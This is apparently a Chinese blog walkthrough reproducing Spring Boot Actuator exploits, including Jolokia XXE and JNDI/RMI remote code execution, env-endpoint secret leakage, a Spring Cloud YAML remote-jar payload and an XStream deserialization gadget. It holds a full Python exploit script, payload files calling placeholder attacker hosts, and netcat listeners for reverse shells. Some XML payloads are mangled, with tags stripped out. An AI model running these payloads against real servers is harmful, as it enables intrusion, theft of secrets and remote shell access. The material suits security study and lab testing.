bootstrap漏洞_常见Spring Boot漏洞复现

本文详细介绍了Spring Boot的几个常见漏洞复现过程,包括Jolokia的XXE和RCE漏洞,env端点敏感信息泄露,以及xstream反序列化漏洞。通过环境搭建、端点利用和漏洞攻击步骤,展示了如何利用这些漏洞获取系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

复现一下Sprint Boot的一些漏洞

  • 环境搭建

Dump环境

c447bf231cae06451e36d113fe8ec31e.png

Mvn构建项目

f39e5254e531e5a4f87434b69a8939e5.png

启动项目

ac2fd2e202cb7287d7c022d6bfd1313f.png

aa58181d8b83d404c6703593d9f860c7.png

  • 端点信息

路径 描述

/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过

/beans 描述应用程序上下文里全部的Bean,以及它们的关系

/env 获取全部环境属性

/configprops 描述配置属性(包含默认值)如何注入Bean

/dump 获取线程活动的快照

/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供

/info 获取应用程序的定制信息,这些信息由info打头的属性提供

/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系

/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数

/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true

/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

  • Spring Boot 1.x版本端点在根URL下注册

2.x版本端点移动到/actuator/路径

59da13dfc2b7cd6460035502f0726eec.png

Jolokia漏洞利用

Jolokia漏洞利用(XXE)

  • jolokia/list

查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法

45cd5252eceba744a5e8e3bf5af45ba0.png

  • 创建logback.xml和fileread.dtd文件

logback.xml

xml version="1.0" encoding="utf-8" ?>

%remote;%int;]>

&trick;

fileread.dtd

">

  • 将文件上传到公网VPS上并且开启http服务

cfdaead0c777b9e0b152033cac22f0b0.png

  • 远程访问logback.xml文件

127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml

  • 成功利用xxe读取到etc/passwd文件内容

d2ce07cd85c48d1b82ffbac570363df9.png

Jolokia漏洞利用(RCE)

  • 下载修改RMI服务代码

f0d4e7d8d1227f0367488675fc199649.png

  • 编译打包

mvn clean install

打包成功后创建target目录下生成RMIServer-0.1.0.jar文件

3da1fe5914906ac2f492f1252763be99.png

  • 修改logback.xml文件内容

env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" />

290f01b8486da0c2120b7fc00f941df8.png

  • 把RMIServer-0.1.0.jar文件上传到公网vps上并执行

java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar

b1a34a4c084e439dbc1f365ff6eb3fe5.png

  • nc监听

nc -lvp 6666

22b75af987961a86b4990421cb878482.png

  • 漏洞url上访问

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/xxx.xxx.xxx.xxx!/logback.xml

  • 反弹shell

9fe5c87d87fc38de34171d643ca343ec.png

Jolokia漏洞利用(RCE-createJNDIRealm方法)

查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法,可能存在JNDI注入,导致远程代码执行

  • python执行脚本

import requests as req

import sys

from pprint import pprint

url = sys.argv[1] + "/jolokia/"

pprint(url)

#创建JNDIRealm

create_JNDIrealm = {

"mbean": "Tomcat:type=MBeanFactory",

"type": "EXEC",

"operation": "createJNDIRealm",

"arguments": ["Tomcat:type=Engine"]

}

#写入contextFactory

set_contextFactory = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "WRITE",

"attribute": "contextFactory",

"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

#写入connectionURL为自己公网RMI service地址

set_connectionURL = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "WRITE",

"attribute": "connectionURL",

"value": "rmi://x.x.x.x:1097/jndi"

}

#停止Realm

stop_JNDIrealm = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "EXEC",

"operation": "stop",

"arguments": []

}

#运行Realm,触发JNDI 注入

start = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "EXEC",

"operation": "start",

"arguments": []

}

expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]

for i in expoloit:

rep = req.post(url, json=i)

pprint(rep.json())

  • 运行RMI服务

java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar

cb108e6859f686783a84ffa50ac8fb63.png

  • nc 监听

nc -lvp 6666

  • python发送请求

python exp.py http://127.0.0.1:8090

9006e8421e2076e3d69c1777cfe80ca5.png

  • 反弹shell

9fe5c87d87fc38de34171d643ca343ec.png

env端点利用

SpringBoot env 获取* 敏感信息

如果Spring Cloud Libraries在路径中,则'/env'端点会默认允许修改Spring环境属性。“@ConfigurationProperties”的所有bean都可以进行修改和重新绑定。

  • 例如要获取PID(这是假设,假设PID为**)

63531741d7607b4c50156aec54f6ff06.png

  • 修改enveureka.client.serviceUrl.defaultZone属性

42be5dffdb9eb9c2559cae3605d1fe12.png

a1fddac5df0208db0087efb458419907.png

  • nc监听

e5196ccb664f2f1190e4dc370e129bb5.png

  • refresh

ae9c87cb5e84f38125704cb7835bb805.png

  • base64解码获取属性

a0eb72251c5acc832902abc3b83fddd0.png

spring Cloud env yaml利用

当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE

  • 利用范围

Spring Boot 2.x 无法利用成功 Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功 Spring Boot <= 1.4 可利用成功

  • 下载exp修改执行命令

https://github.com/artsploit/yaml-payload

76b87ad73e646d9c4c67f9eed622db63.png

  • 将java文件进行编译

javac src/artsploit/AwesomeScriptEngineFactory.java

jar -cvf yaml-payload.jar -C src/ .

87fcb38f433a609817767869fe880667.png

  • 创建yaml文件并放到公网

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[

!!java.net.URL ["http://xxx.xxx.xxx.xxx:8000/yaml-payload.jar"] ]]

]

  • 修改 spring.cloud.bootstrap.location为外部 yml 配置文件地址

e3027aef9dd482f740f8335d0afc4935.png

  • 请求 /refresh 接口触发

d7b7320512a9f8d28efbef4789c848e7.png

  • 执行命令成功

2158fb8ea015678690948cb6e335101e.png

xstream反序列化

  • 前提条件

Eureka-Client <1.8.7(多见于Spring Cloud Netflix)

  • 在VPS创建xstream文件,使用flask返回application/xml格式数据

from flask import Flask, Response

app = Flask(__name__)

@app.route('/', defaults={'path': ''})

@app.route('/', methods = ['GET', 'POST'])

def catch_all(path):

xml = """

com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

javax.crypto.CipherInputStream">

javax.crypto.NullCipher">

javax.imageio.spi.FilterIterator">

javax.imageio.spi.FilterIterator">

java.util.Collections$EmptyIterator"/>

java.lang.ProcessBuilder">

命令

false

javax.imageio.ImageIO$ContainsFilter">

java.lang.ProcessBuilder

start

foo

foo

java.lang.ProcessBuilder$NullInputStream"/>

"""

return Response(xml, mimetype='application/xml')

  • 启动服务

python3 flask_xstream.py

d46c55f437bf1adc80dd9f2f115199d3.png

  • 写入配置

96661431fa9bfad9913e4c88f87f397e.png

  • 刷新触发

b86034edfc6453671179bf11e2a2a265.png

  • 获取反弹shell

86b7f397a63c569c9e2d38f5a1248442.png

参考

一次曲折的渗透测试之旅

Spring Boot Actuator 漏洞利用

Spring Boot Actuators配置不当导致RCE漏洞复现

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值